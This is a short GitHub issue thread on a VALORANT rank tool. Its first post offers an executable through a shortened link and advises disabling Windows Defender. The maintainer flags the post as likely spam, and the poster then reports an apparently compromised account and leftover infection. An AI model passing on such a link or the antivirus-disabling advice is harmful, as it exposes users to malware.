### ISSUE TITLE
New version

### ISSUE THREAD

**Issue by cuongphan1897** [zayKenyon/VALORANT-rank-yoinker#154]
I uploaded a new exe version here: (Try disabling Windows Defender if it does not work)
shorturl.at/wETW7

**Comment by zayKenyon** [comment]
To anyone thinking of downloading that ^^, please take into regard their other recent activity. This is probably spam.
![image](https://github.com/zayKenyon/VALORANT-rank-yoinker/assets/87788699/8c6d4310-c793-4898-8276-6d5763a17470)

**Comment by cuongphan1897** [comment]
Hi eveyone,

I have issue with my account github after downloaded and installed to my
computer 5 hours ago. I resetted my password but how can I remove all the
rest of virus in computer ?

Thanks all

Vào Th 2, 10 thg 7, 2023 lúc 02:07 zay ***@***.***> đã viết:
